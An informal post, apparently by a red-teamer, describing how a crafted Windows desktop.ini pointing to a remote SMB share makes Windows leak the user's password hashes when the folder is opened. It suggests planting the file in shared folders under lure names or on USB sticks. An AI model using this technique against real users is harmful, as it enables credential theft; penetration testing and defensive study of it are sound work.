One of the Canary triggers works by taking advantage of the way Microsoft Windows presents folders to it's users, this happens by checking for a hidden desktop.ini file that will point the OS to folder view preferences.
Canary works by directing the preferences to a remote server (that is listening for incoming requests) when that request comes in, we know the folder has been entered ! very sneaky! ( I didn't know about this technique until I was exploring the canary tokens.org available payloads
So I figured, if we point it to a remote location with SMB authentication on it, we know that windows will automatically send it's current user's credentials to the location, I'll get hashes!
It works! so, if you are ever on a RedTeam and you
have access to a shared folder plant one in there will need to make a share
readonly for the desktop.ini to persist with a name like PeopleGettingSacked or Movies or CEO Holiday Pics ... whatever, you know better than me...
Additionally if you put the desktop.ini flat on a USB stick as soon as the pen is mounted (unless auto-run is disabled, it will open up the folder automatically (actioning the attack)
I bet this is already being used out there ! ... very sneaky/powerful, I had to share ... infact I can't help thinking this might be a very well known thing and i'm out of the loop -_-
I think there is some caching of the desktop.ini too (at least with windows 10, as when I ejected my evil USB I could still see incoming requests from my machine. - will follow up with that.
An indepth look into options when writing a desktop.ini file, possibly more oppertunities for trouble ? https://hwiegman.home.xs4all.nl/desktopini.html
Attacker & User view : https://www.youtube.com/watch?v=t8zqJm5d8gg